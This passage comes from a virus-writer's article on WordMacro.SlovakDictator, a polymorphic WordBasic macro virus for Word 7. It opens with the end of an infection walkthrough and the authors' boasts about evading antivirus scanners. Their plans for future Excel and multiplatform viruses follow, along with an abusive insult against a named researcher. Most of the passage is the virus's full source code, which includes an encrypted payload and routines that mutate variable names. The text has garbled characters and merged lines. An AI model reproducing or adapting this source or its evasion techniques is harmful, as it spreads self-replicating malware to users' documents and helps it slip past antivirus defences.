7. It runs this temporary macro When the macro is executed it first checks, whether it has toinfect global template or document. If the global template and the closing document alreadycontains macro named AutoClose nothing is done. Otherwise the macro creates a macroAutoClose in the global template or document and executes similar actions which weredescribed in the previous paragraphs.
The macro contains the special payload. In theeach 4th and 11th of the month it displays amessage box with a special warning that you areinfected by WordMacro.SlovakDictator virus.
8. It deletes the temporary macro, enables screen updating, enables interrupting a macro bypressing the ESC key and finishes.
.
Advantages of the virus:
The virus brings the new technology to macro viruses writing :) It is the first Slovak macro virus :) It is the first world true polymorphic virus :) Its source lines are internally encrypted by a different encryption constant :) It will be hard to detect it by "search strings", because it does not contain any typical virus
strings. It can not be detected by computing CRC (only lame researchers will do that) :) The largest possible string is 15 bytes long, but this string can not be used as a virus string. It does not use commands for copying macros :) It does not contain an operation suspected for heuristic scanners :) Known antivirus program does not detect it, even heuristic programs
Disadvantages:
The process of the infection is very slow, it may take over 15 seconds on slow PC's (ontested Pentium 166 Mhz it took 15 seconds) :|
Although the virus prevents the ESC key from interrupting the macro, pressing keys whilethe virus is running may cause a bug in creating mutated names of variables and due to thisreason a bug in the executing macro may occur. (it will be fixed in the version for Word 8.0) :|
The virus is language dependent - it infects only English version of Word 7.x documents.Due to its special infection techniques it is not able to infect Word 8.0 documents.
There are two variants of this virus -WordMacro.SlovakDictator.A (described in thisarticle) and WordMacro.SlovakDictator.B. In thevariant B were done small changes but the basicshas remained the same. This variant workssimilarily as the variant A, but it displays thefollowing dialog box:
Our plans for the near future
We would like to show the big potential of the Micro$oft Visual Basic to all macro viruseswriters by rewriting SlovakDictator for the Micro$oft Word version 8.0. We hope that the nextversion written in Visual Basic will be undetectable for a long time. We are planing also towrite fully polymorphic macro virus infecting the Micro$oft Excel documents and amultiplatform virus infecting the Office documents.
Conclusion
The Lamer's Macro Engine and the source code generator of the described macro virus is notpresented because each lamer, even Vesselin B. (well known as fucking pig and shithead), isable in 20 minutes analyze this virus and understand it. But we are not sure about thatVesselin B :). We wrote this virus within one day and we hope that the other lame macro viruswriters are able to do it too.And finally, we just invented the brand new method, how to speed up the internal encryptionand decryption, so the next version will be much faster (and maybe it will be permutated !):)
Big thanks goes to ( MacroFuck Corporation for their famous Virus Development Kit formultiple platforms.Micro$oft Word is a registered trade mark of the ( MacroFuck Corporation)
Dedicated to:
Download here
SLDICT_A.SRC
REM --------- WordMacro.SlovakDictator.AREM --------- source code - 2nd generationREM --------- it is cool, isn't it ?REM --------- do not modify !REM ---------------------------------------Dim Shared JOLSRGVAJVAVPCQSFSDim Shared RSTSDTQABCFRIMEDSDim Shared NNJVBQFICLBTDim Shared CTSBMNQRJVKTUNDim Shared RAQIEGQHTEKGMJPADim Shared BLMVUIODKQIDDim Shared TRFEHFFKDGADim Shared PNFFUDGIOJHJMOJSDim Shared EEMSCNFUSDSADim Shared IMNVDDCUIELPKGOQDim Shared KILNETOHSCNTSGEBDim Shared FDCKUBLQVSMCLCS$(200 )Dim Shared ESBGMDHQMTVDim Shared UKEHLODOGSTCBCFESDim Shared LAOGRDANQUAUGEMDRCDim Shared TISEIKHODQQCGBM$(31)Dim Shared VAHINRNESDMBBCBTNOG
Sub MAINOn Error Goto BCLHQBLUFOGCODisableInput 1JOLSRGVAJVAVPCQSFS =0RSTSDTQABCFRIMEDS =1NNJVBQFICLBT = 2CTSBMNQRJVKTUN =7RAQIEGQHTEKGMJPA =10BLMVUIODKQID = 20TRFEHFFKDGA =22PNFFUDGIOJHJMOJS =65EEMSCNFUSDSA =34IMNVDDCUIELPKGOQ =64ESBGMDHQMTV =38UKEHLODOGSTCBCFES =120LAOGRDANQUAUGEMDRC =179VAHINRNESDMBBCBTNOG =31GPDTGRQFBAB$ = AppInfo$(NNJVBQFICLBT)SBKVJOSUHRSLRIAJTBQ = Val(Left$(GPDTGRQFBAB$, RSTSDTQABCFRIMEDS))If SBKVJOSUHRSLRIAJTBQ <> CTSBMNQRJVKTUNThen Goto BCLHQBLUFOGCOCall FVNIPFORQMUIVScreenUpdating JOLSRGVAJVAVPCQSFSDisableAutoMacros RSTSDTQABCFRIMEDSQRQLVKABPUEJAAJGMF
CUMKMEDQSRG$ = WindowName$()ToolsMacro .Name = "KRTMEMGAIRIIJV" , .Show = RSTSDTQABCFRIMEDS, .EditEditClear - BLMVUIODKQIDFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo LAOGRDANQUAUGEMDRC : Insert FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) : InsertPara : Next OTSPNBQUVCREARJ
EditReplace .Find = Chr$(IMNVDDCUIELPKGOQ) + Chr$(IMNVDD CUIELPKGOQ), .Replace = Chr$(EEMSCNFUSDSA), .Direction = JOLSRGVAJVAVPCQSFS, .MatchC ase = RSTSDTQABCFRIMEDS, .WholeWord =JOLSRGVAJVAVPCQSFS, .PatternMatch = JOLSRGVAJVAVPCQSFS, .SoundsLike = JOLSRGVAJVAVPCQSFS, .ReplaceAll, .Format = JOLSRGVAJVAVPCQSFS, .Wrap = RSTSDTQ ABCFRIMEDS, .FindAllWordForms =JOLSRGVAJVAVPCQSFS
NBRAOKIBBFOKGI
SLDICT_A.SRC
UFFHOQFGCUDocClose RSTSDTQABCFRIMEDSActivate CUMKMEDQSRG$
Call KRTMEMGAIRIIJVToolsMacro .Name = "KRTMEMGAIRIIJV" , .Show = RSTSDTQABCFRIMEDS, .Delete
BCLHQBLUFOGCO:DisableAutoMacros JOLSRGVAJVAVPCQSFSScreenUpdating RSTSDTQABCFRIMEDSDisableInput JOLSRGVAJVAVPCQSFSEnd Sub
Sub QRQLVKABPUEJAAJGMFFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo LAOGRDANQUAUGEMDRCBVEDQHRBEVT$ =""SKPAQDHJGRB = Len(FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ))For FVVNOICFUVCMSET = RSTSDTQABCFRIMEDSTo SKPAQDHJGRBBVEDQHRBEVT$ = BVEDQHRBEVT$ + Chr$(Asc(Mid$ (FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ),FVVNOICFUVCMSET, RSTSDTQABCFRIMEDS)) - KILNETOHSCNTSGEB)Next FVVNOICFUVCMSETFDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) = BVEDQHRBEVT$Next OTSPNBQUVCREARJEnd Sub
Sub NBRAOKIBBFOKGIFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo LAOGRDANQUAUGEMDRCInsert "FDCKUBLQVSMCLCS$("+ Str$(OTSPNBQUVCREARJ) + ")=" + Chr$(EEMSCNFUSDSA) +FDCKUBLQVSMCLCS$(OTSPNBQUVCREARJ) + Chr$(EEMSCNFUSDSA)InsertParaNext OTSPNBQUVCREARJFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo VAHINRNESDMBBCBTNOG - RSTSDTQABCFRIMEDSInsert "TISEIKHODQQCGBM$(" + Str$(OTSPNBQUVCREARJ) + ")=" + Chr$(EEMSCNFUSDSA) +TISEIKHODQQCGBM$(OTSPNBQUVCREARJ) + Chr$(EEMSCNFUSDSA)InsertParaNext OTSPNBQUVCREARJEnd Sub
Function EJQGEPDKDADFPSQN$BVEDQHRBEVT$ =""For OTSPNBQUVCREARJ = RSTSDTQABCFRIMEDSTo RAQIEGQHTEKGMJPA + Rnd() * RAQIEGQHTEKGMJPA :BVEDQHRBEVT$ = BVEDQHRBEVT$ + Chr$(Rnd() * TRFEHFFKDGA + PNFFUDGIOJHJMOJS) : NextOTSPNBQUVCREARJEJQGEPDKDADFPSQN$ = BVEDQHRBEVT$End Function
Sub UFFHOQFGCUFor OTSPNBQUVCREARJ = JOLSRGVAJVAVPCQSFSTo VAHINRNESDMBBCBTNOG - RSTSDTQABCFRIMEDSEditReplace .Find = TISEIKHODQQCGBM$(OTSPNBQUVCREARJ), .Replace = EJQGEPDKDADFPSQN$, .Direction = JOLSRGVAJVAVPCQSFS, .MatchCase = RSTSDTQABCF RIMEDS, .WholeWord =JOLSRGVAJVAVPCQSFS, .PatternMatch = JOLSRGVAJVAVPCQSFS, .SoundsLike = JOLSRGVAJVAVPCQSFS, .ReplaceAll, .Format = JOLSRGVAJVAVPCQSFS, .Wrap = RSTSDTQ ABCFRIMEDS, .FindAllWordForms =JOLSRGVAJVAVPCQSFSNext OTSPNBQUVCREARJEnd Sub
Sub FVNIPFORQMUIVKILNETOHSCNTSGEB = 6FDCKUBLQVSMCLCS$(0) = "Jos&Yngxkj&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(1) = "Jos&Yngxkj&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(2) = "Jos&Yngxkj&TTP\HWLOIRHZ"FDCKUBLQVSMCLCS$(3) = "Jos&Yngxkj&IZYHSTWXP\QZ[T"
SLDICT_A.SRC
FDCKUBLQVSMCLCS$(4) = "Jos&Yngxkj&XGWOKMWNZKQMSPVG"FDCKUBLQVSMCLCS$(5) = "Jos&Yngxkj&HRS\[OUJQWOJ"FDCKUBLQVSMCLCS$(6) = "Jos&Yngxkj&ZXLKNLLQJMG"FDCKUBLQVSMCLCS$(7) = "Jos&Yngxkj&VTLL[JMOUPNPSUPY"FDCKUBLQVSMCLCS$(8) = "Jos&Yngxkj&KKSYITL[YJYG"FDCKUBLQVSMCLCS$(9) = "Jos&Yngxkj&OST\JJI[OKRVQMUW"FDCKUBLQVSMCLCS$(10) = "Jos&Yngxkj&QORTKZUNYITZYMKH"FDCKUBLQVSMCLCS$(11) = "Jos&Yngxkj&LJIQ[HRW\YSIRIY*.866/"FDCKUBLQVSMCLCS$(12) = "Jos&Yngxkj&KYHMSJNWSZ\"FDCKUBLQVSMCLCS$(13) = "Jos&Yngxkj&[QKNRUJUMYZIHILKY"FDCKUBLQVSMCLCS$(14) = "Jos&Yngxkj&RGUMXJGTW[G[MKSJXI"FDCKUBLQVSMCLCS$(15) = "Jos&Yngxkj&ZOYKOQNUJWWIMHS*.97/"FDCKUBLQVSMCLCS$(16) = "Jos&Yngxkj&\GNOTXTKYJSHHIHZTUM"FDCKUBLQVSMCLCS$(17) = ""FDCKUBLQVSMCLCS$(18) = "Y{h&SGOT"FDCKUBLQVSMCLCS$(19) = "Ut&Kxxux&Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(20) = "JoyghrkOtv{z&7"FDCKUBLQVSMCLCS$(21) = "PURYXM\GP\G\VIWYLY&C&6"FDCKUBLQVSMCLCS$(22) = "XYZYJZWGHILXOSKJY&C&7"FDCKUBLQVSMCLCS$(23) = "TTP\HWLOIRHZ&C&8"FDCKUBLQVSMCLCS$(24) = "IZYHSTWXP\QZ[T&C&="FDCKUBLQVSMCLCS$(25) = "XGWOKMWNZKQMSPVG&C&76"FDCKUBLQVSMCLCS$(26) = "HRS\[OUJQWOJ&C&86"FDCKUBLQVSMCLCS$(27) = "ZXLKNLLQJMG&C&88"FDCKUBLQVSMCLCS$(28) = "VTLL[JMOUPNPSUPY&C&<;"FDCKUBLQVSMCLCS$(29) = "KKSYITL[YJYG&C&9:"FDCKUBLQVSMCLCS$(30) = "OST\JJI[OKRVQMUW&C&<:"FDCKUBLQVSMCLCS$(31) = "KYHMSJNWSZ\&C&9>"FDCKUBLQVSMCLCS$(32) = "[QKNRUJUMYZIHILKY&C&786"FDCKUBLQVSMCLCS$(33) = "RGUMXJGTW[G[MKSJXI&C&7=?"FDCKUBLQVSMCLCS$(34) = "\GNOTXTKYJSHHIHZTUM&C&97"FDCKUBLQVSMCLCS$(35) = "MVJZMXWLHGH*&C&GvvOtlu*.TTP\HWLOIRHZ/"FDCKUBLQVSMCLCS$(36) = "YHQ\PUY[NXYRXOGPZHW&C&\gr.Rklz*.MVJZMXWLHGH*2&XYZYJZWGHILXOSKJY//"FDCKUBLQVSMCLCS$(37) = "Ol&YHQ\PUY[NXYRXOGPZHW&BD&IZYHSTWXP\QZ[T&Znkt&Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(38) = "Igrr&L\TOVLUXWS[O\"FDCKUBLQVSMCLCS$(39) = "-5555&hkmot&ul&nojjkt&vgxz&5555"FDCKUBLQVSMCLCS$(40) = "Ynu}Hu~"FDCKUBLQVSMCLCS$(41) = "I{xLork*&C&LorkTgsk*./"FDCKUBLQVSMCLCS$(42) = "Ol&I{xLork*&C&FFFF&Znkt&Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(43) = ""FDCKUBLQVSMCLCS$(44) = "Ol&InkiqOtyzgrrkj.6/&C&6&Znkt"FDCKUBLQVSMCLCS$(45) = "Otlkiz.7/"FDCKUBLQVSMCLCS$(46) = "ZuuryUvzoutyYg|k&4MruhgrJuzVxusvz&C&62&4LgyzYg|ky& C&6"FDCKUBLQVSMCLCS$(47) = "Muzu&HIRNWHR[LUMIU"FDCKUBLQVSMCLCS$(48) = "Ktj&Ol"FDCKUBLQVSMCLCS$(49) = ""FDCKUBLQVSMCLCS$(50) = "Jos&jrm&Gy&LorkYg|kGy"FDCKUBLQVSMCLCS$(51) = "MkzI{x\gr{ky&jrm"FDCKUBLQVSMCLCS$(52) = "Ol&jrm4Luxsgz&C&6&Znkt"FDCKUBLQVSMCLCS$(53) = "jrm4Luxsgz&C&7"FDCKUBLQVSMCLCS$(54) = "LorkYg|kGy&jrm"FDCKUBLQVSMCLCS$(55) = "Ktj&Ol"FDCKUBLQVSMCLCS$(56) = ""FDCKUBLQVSMCLCS$(57) = "Ol&InkiqOtyzgrrkj.7/&C&6&Znkt"FDCKUBLQVSMCLCS$(58) = "Otlkiz.9/"FDCKUBLQVSMCLCS$(59) = "LorkYg|k"FDCKUBLQVSMCLCS$(60) = "Ktj&Ol"FDCKUBLQVSMCLCS$(61) = ""FDCKUBLQVSMCLCS$(62) = "HIRNWHR[LUMIU@"FDCKUBLQVSMCLCS$(63) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(64) = ""FDCKUBLQVSMCLCS$(65) = "Y{h&Ynu}Hu~"
SLDICT_A.SRC
FDCKUBLQVSMCLCS$(66) = � �"Vgxrgsktzt V{i&C&Jg .Tu}.//"FDCKUBLQVSMCLCS$(67) = � �"Ol&Vgxrgsktzt V{i&C&:&Ux&Vgxrgsktzt V{i&C&77&Znkt"FDCKUBLQVSMCLCS$(68) = "Hkkv"FDCKUBLQVSMCLCS$(69) = "Hkmot&Jogrum&[ykxJogrum&9>62&88:2&FF\ox{y&GRKXZ'FF "FDCKUBLQVSMCLCS$(70) =
�"Zk~z&8?2&>2&9:?2&792&FF_u{-xk&otlkizkj&h &]uxjSgixu 4Yru|gqJoizgzux&|ox{yFF2&4Zk~z7"FDCKUBLQVSMCLCS$(71) ="Zk~z&7;2&8>2&9<62&792&FF]kriusk&zu&znk&RSK&.Rgskx- y&Sgixu&Ktmotk/&|kx4&7466FF2&4Zk~z8"FDCKUBLQVSMCLCS$(72) = "Zk~z&7:;2&;72&7892&792&FFJoy&oy&Rk|kr&:87FF2&4Zk~z 9"FDCKUBLQVSMCLCS$(73) =
� �"Zk~z&9;2&=92&9:82&792&FF.i/&73sgx3?=2&Tgyz &Rgskx&, ,&[mr &R{ykx2&Yru|gqogFF2&4Zk~z:"FDCKUBLQVSMCLCS$(74) =
�"Zk~z&9:2&?>2&9:92&792&FFJoy&oy&znk&loxyz&}uxrj&zx{ k&vur suxvnoi&sgixu&|ox{y&'FF2&4Zk~z;"FDCKUBLQVSMCLCS$(75) = "V{ynH{zzut&7862&7>>2&7:=2&872&FFGiikvz&5&Y{nrgyFF2 &4V{yn7"FDCKUBLQVSMCLCS$(76) = "Zk~z&7662&7<;2&88>2&792&FFHom&l{iq&zu&znk&hom&hu~k x&\4S4FF2&4Zk~z<"FDCKUBLQVSMCLCS$(77) = "Ktj&Jogrum"FDCKUBLQVSMCLCS$(78) = "Jos&jrm&Gy&[ykxJogrum"FDCKUBLQVSMCLCS$(79) = "Jogrum.jrm/"FDCKUBLQVSMCLCS$(80) = "Ktj&Ol"FDCKUBLQVSMCLCS$(81) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(82) = ""FDCKUBLQVSMCLCS$(83) = "L{tizout&InkiqOtyzgrrkj.p/"FDCKUBLQVSMCLCS$(84) = "Ut&Kxxux&Xky{sk&Tk~z"FDCKUBLQVSMCLCS$(85) = "InkiqOtyzgrrkj&C&6"FDCKUBLQVSMCLCS$(86) = "Lux&o&C&7&Zu&Iu{tzSgixuy.p/"FDCKUBLQVSMCLCS$(87) = "Ol&SgixuTgsk*.o2&p/&C&FFG{zuIruykFF&Znkt&InkiqOtyz grrkj&C&7"FDCKUBLQVSMCLCS$(88) = "Tk~z&o"FDCKUBLQVSMCLCS$(89) = "Ktj&L{tizout"FDCKUBLQVSMCLCS$(90) = ""FDCKUBLQVSMCLCS$(91) = "Y{h&Otlkiz.]ngzZuOtlkiz/"FDCKUBLQVSMCLCS$(92) = "I[SQSKJWYXM*&C&]otju}Tgsk*./"FDCKUBLQVSMCLCS$(93) = "ZuurySgixu&4Tgsk&C&FFG{zuIruykFF2&4Ynu}&C&]ngzZuOt lkiz2&4Kjoz"FDCKUBLQVSMCLCS$(94) = "KjozIrkgx&3&86"FDCKUBLQVSMCLCS$(95) = ""FDCKUBLQVSMCLCS$(96) = "-5555"FDCKUBLQVSMCLCS$(97) = �"-5555&\ru€ktok&vx| in&KYHMSJNWSZ\&xogjqu|&quj{&sgqx g"FDCKUBLQVSMCLCS$(98) = "-5555&|ojozkrtg&igyz&3&tksktoz&'"FDCKUBLQVSMCLCS$(99) = "-5555"FDCKUBLQVSMCLCS$(100 ) ="Lux&o&C&6&Zu&KYHMSJNWSZ\&@&Otykxz&LJIQ[HRW\YSIRIY* .o/&@&OtykxzVgxg&@&Tk~z&o"FDCKUBLQVSMCLCS$(101 ) = "-5555"FDCKUBLQVSMCLCS$(102 ) = �"-5555&vxkskttg&o&ojk&uj&xogjqu|&FFY{h&UxomotgrSgix uHuj FF17"FDCKUBLQVSMCLCS$(103 ) = "-5555&g€&vu&FFY{h&L\TOVLUXWS[O\FF37"FDCKUBLQVSMCLCS$(104 ) = �"-5555&|krso&vu€uxtk&{xioz&zokzu&qutyzgtz &'''"FDCKUBLQVSMCLCS$(105 ) = "-5555"FDCKUBLQVSMCLCS$(106 ) ="Lux&o&C&[QKNRUJUMYZIHILKY&Zu&RGUMXJGTW[G[MKSJXI&@&Otykxz&LJIQ[HRW\YSIRIY*.o/&@&OtykxzVgxg&@&Tk~z&o"FDCKUBLQVSMCLCS$(107 ) ="KjozXkvrgik&4Lotj&C&Inx*.<:/&1&Inx*.<:/2&4Xkvrgik& C&Inx*.9:/2&4Joxkizout&C&62&4SgzinIgyk&C&72&4]nurk]uxj&C&62&4VgzzkxtSgzin&C&62&4Yu{tjyRoqk&C&6 2&4XkvrgikGrr2&4Luxsgz&C&62&4]xgv&C&72&4LotjGrr]uxjLuxsy&C&6"FDCKUBLQVSMCLCS$(108 ) = ""FDCKUBLQVSMCLCS$(109 ) = "QORTKZUNYITZYMKH&C&3&Otz..:&1&Xtj./&0&76//"FDCKUBLQVSMCLCS$(110 ) = "Igrr&WXWR\QGHV[KPGGPMSL"FDCKUBLQVSMCLCS$(111 ) = "Otykxz&FFQORTKZUNYITZYMKH&C&FF&1&Yzx*.3&QORTKZUNYITZYMKH/"FDCKUBLQVSMCLCS$(112 ) = "OtykxzVgxg"FDCKUBLQVSMCLCS$(113 ) = "THXGUQOHHLUQMO"FDCKUBLQVSMCLCS$(114 ) = "JuiIruyk&7"FDCKUBLQVSMCLCS$(115 ) = "Gizo|gzk&I[SQSKJWYXM*"FDCKUBLQVSMCLCS$(116 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(117 ) = ""
SLDICT_A.SRC
FDCKUBLQVSMCLCS$(118 ) = �"Y{h&UxomotgrSgixuHuj "FDCKUBLQVSMCLCS$(119 ) = "-5555&ktj&ul&Nojjkt&vgxz&5555"FDCKUBLQVSMCLCS$(120 ) = "Yixkkt[vjgzotm&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(121 ) = "JoyghrkG{zuSgixuy&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(122 ) = "WXWR\QGHV[KPGGPMSL"FDCKUBLQVSMCLCS$(123 ) = ""FDCKUBLQVSMCLCS$(124 ) = "I[SQSKJWYXM*&C&]otju}Tgsk*./"FDCKUBLQVSMCLCS$(125 ) ="ZuurySgixu&4Tgsk&C&FFQXZSKSMGOXOOP\FF2&4Ynu}&C&XYZYJZWGHILXOSKJY2&4Kjoz"FDCKUBLQVSMCLCS$(126 ) = "KjozIrkgx&3&HRS\[OUJQWOJ"FDCKUBLQVSMCLCS$(127 ) ="Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI&@&Otykxz&LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&@&OtykxzVgxg&@&Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(128 ) = ""FDCKUBLQVSMCLCS$(129 ) ="KjozXkvrgik&4Lotj&C&Inx*.OST\JJI[OKRVQMUW/&1&Inx*. OST\JJI[OKRVQMUW/2&4Xkvrgik&C&Inx*.KKSYITL[YJYG/2&4Joxkizout&C&PURYXM\GP\G\VIWYLY2&4SgzinIgyk& C&XYZYJZWGHILXOSKJY2&4]nurk]uxj&C&PURYXM\GP\G\VIWYLY2&4VgzzkxtSgzin&C&PURYXM\GP\G\VIWYLY2&4Yu{ tjyRoqk&C&PURYXM\" +"GP\G\VIWYLY2&4XkvrgikGrr2&4Luxsgz&C&PURYXM\GP\G\VI WYLY2&4]xgv&C&XYZYJZWGHILXOSKJY2&4LotjGrr]uxjLuxsy&C&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(130 ) = ""FDCKUBLQVSMCLCS$(131 ) = "THXGUQOHHLUQMO"FDCKUBLQVSMCLCS$(132 ) = "[LLNUWLMI["FDCKUBLQVSMCLCS$(133 ) = "JuiIruyk&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(134 ) = "Gizo|gzk&I[SQSKJWYXM*"FDCKUBLQVSMCLCS$(135 ) = ""FDCKUBLQVSMCLCS$(136 ) = "Igrr&QXZSKSMGOXOOP\"FDCKUBLQVSMCLCS$(137 ) ="ZuurySgixu&4Tgsk&C&FFQXZSKSMGOXOOP\FF2&4Ynu}&C&XYZYJZWGHILXOSKJY2&4Jkrkzk"FDCKUBLQVSMCLCS$(138 ) = ""FDCKUBLQVSMCLCS$(139 ) = "HIRNWHR[LUMIU@"FDCKUBLQVSMCLCS$(140 ) = "JoyghrkG{zuSgixuy&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(141 ) = "Yixkkt[vjgzotm&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(142 ) = "JoyghrkOtv{z&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(143 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(144 ) = ""FDCKUBLQVSMCLCS$(145 ) = "Y{h&WXWR\QGHV[KPGGPMSL"FDCKUBLQVSMCLCS$(146 ) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI"FDCKUBLQVSMCLCS$(147 ) = "H\KJWNXHK\Z*&C&FFFF"FDCKUBLQVSMCLCS$(148 ) = "YQVGWJNPMXH&C&Rkt.LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP //"FDCKUBLQVSMCLCS$(149 ) = "Lux&L\\TUOIL[\ISYKZ&C&XYZYJZWGHILXOSKJY&Zu&YQVGWJNPMXH"FDCKUBLQVSMCLCS$(150 ) ="H\KJWNXHK\Z*&C&H\KJWNXHK\Z*&1&Inx*.Gyi.Soj*.LJIQ[H RW\YSIRIY*.UZYVTHW[\IXKGXP/2&L\\TUOIL[\ISYKZ2&XYZYJZWGHILXOSKJY//&3&QORTKZUNYITZYMKH/"FDCKUBLQVSMCLCS$(151 ) = "Tk~z&L\\TUOIL[\ISYKZ"FDCKUBLQVSMCLCS$(152 ) = "LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&C&H\KJWNXHK\Z*"FDCKUBLQVSMCLCS$(153 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(154 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(155 ) = ""FDCKUBLQVSMCLCS$(156 ) = "Y{h&THXGUQOHHLUQMO"FDCKUBLQVSMCLCS$(157 ) = "Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&RGUMXJGTW[G[MKSJXI"FDCKUBLQVSMCLCS$(158 ) ="Otykxz&FFLJIQ[HRW\YSIRIY*.FF&1&Yzx*.UZYVTHW[\IXKGX P/&1&FF/CFF&1&Inx*.KKSYITL[YJYG/&1&LJIQ[HRW\YSIRIY*.UZYVTHW[\IXKGXP/&1&Inx*.KKSYITL[YJYG/"FDCKUBLQVSMCLCS$(159 ) = "OtykxzVgxg"FDCKUBLQVSMCLCS$(160 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(161 ) ="Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&\GNOTXTKYJSHHIHZTUM&3&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(162 ) ="Otykxz&FFZOYKOQNUJWWIMHS*.FF&1&Yzx*.UZYVTHW[\IXKGXP/&1&FF/CFF&1&Inx*.KKSYITL[YJYG/&1&ZOYKOQNUJWWIMHS*.UZYVTHW[\IXKGXP/&1&Inx*.KKSYITL[YJYG/"FDCKUBLQVSMCLCS$(163 ) = "OtykxzVgxg"
SLDICT_A.SRC
FDCKUBLQVSMCLCS$(164 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(165 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(166 ) = ""FDCKUBLQVSMCLCS$(167 ) = "L{tizout&KPWMKVJQJGJLVYWT*"FDCKUBLQVSMCLCS$(168 ) = "H\KJWNXHK\Z*&C&FFFF"FDCKUBLQVSMCLCS$(169 ) ="Lux&UZYVTHW[\IXKGXP&C&XYZYJZWGHILXOSKJY&Zu&XGWOKMWNZKQMSPVG&1&Xtj./&0&XGWOKMWNZKQMSPVG&@&H\KJWNXHK\Z*&C&H\KJWNXHK\Z*&1&Inx*.Xtj./&0&ZXLKNLLQJMG& 1&VTLL[JMOUPNPSUPY/&@&Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(170 ) = "KPWMKVJQJGJLVYWT*&C&H\KJWNXHK\Z*"FDCKUBLQVSMCLCS$(171 ) = "Ktj&L{tizout"FDCKUBLQVSMCLCS$(172 ) = ""FDCKUBLQVSMCLCS$(173 ) = "Y{h&[LLNUWLMI["FDCKUBLQVSMCLCS$(174 ) ="Lux&UZYVTHW[\IXKGXP&C&PURYXM\GP\G\VIWYLY&Zu&\GNOTXTKYJSHHIHZTUM&3&XYZYJZWGHILXOSKJY"FDCKUBLQVSMCLCS$(175 ) ="KjozXkvrgik&4Lotj&C&ZOYKOQNUJWWIMHS*.UZYVTHW[\IXKG XP/2&4Xkvrgik&C&KPWMKVJQJGJLVYWT*2&4Joxkizout&C&PURYXM\GP\G\VIWYLY2&4SgzinIgyk&C&XYZYJZWGHILXOSKJY2&4]nurk]uxj&C&PURYXM\GP\G\VIWYLY2&4VgzzkxtSgzin&C&PURYXM\GP\G\VIWYLY2&4Yu{tjyRoqk&C&PURYX M\GP\G\VIWYLY2&4X" +"kvrgikGrr2&4Luxsgz&C&PURYXM\GP\G\VIWYLY2&4]xgv&C&X YZYJZWGHILXOSKJY2&4LotjGrr]uxjLuxsy&C&PURYXM\GP\G\VIWYLY"FDCKUBLQVSMCLCS$(176 ) = "Tk~z&UZYVTHW[\IXKGXP"FDCKUBLQVSMCLCS$(177 ) = "Ktj&Y{h"FDCKUBLQVSMCLCS$(178 ) = ""FDCKUBLQVSMCLCS$(179 ) = "Y{h&L\TOVLUXWS[O\"TISEIKHODQQCGBM$(0) = "KILNETOHSCNTSGEB"TISEIKHODQQCGBM$(1) = "FDCKUBLQVSMCLCS"TISEIKHODQQCGBM$(2) = "TISEIKHODQQCGBM"TISEIKHODQQCGBM$(3) = "JOLSRGVAJVAVPCQSFS"TISEIKHODQQCGBM$(4) = "RAQIEGQHTEKGMJPA"TISEIKHODQQCGBM$(5) = "TRFEHFFKDGA"TISEIKHODQQCGBM$(6) = "CTSBMNQRJVKTUN"TISEIKHODQQCGBM$(7) = "RSTSDTQABCFRIMEDS"TISEIKHODQQCGBM$(8) = "BLMVUIODKQID"TISEIKHODQQCGBM$(9) = "NNJVBQFICLBT"TISEIKHODQQCGBM$(10) = "PNFFUDGIOJHJMOJS"TISEIKHODQQCGBM$(11) = "EEMSCNFUSDSA"TISEIKHODQQCGBM$(12) = "IMNVDDCUIELPKGOQ"TISEIKHODQQCGBM$(13) = "ESBGMDHQMTV"TISEIKHODQQCGBM$(14) = "UKEHLODOGSTCBCFES"TISEIKHODQQCGBM$(15) = "LAOGRDANQUAUGEMDRC"TISEIKHODQQCGBM$(16) = "VAHINRNESDMBBCBTNOG"TISEIKHODQQCGBM$(17) = "OTSPNBQUVCREARJ"TISEIKHODQQCGBM$(18) = "SKPAQDHJGRB"TISEIKHODQQCGBM$(19) = "FVVNOICFUVCMSET"TISEIKHODQQCGBM$(20) = "BVEDQHRBEVT"TISEIKHODQQCGBM$(21) = "GPDTGRQFBAB"TISEIKHODQQCGBM$(22) = 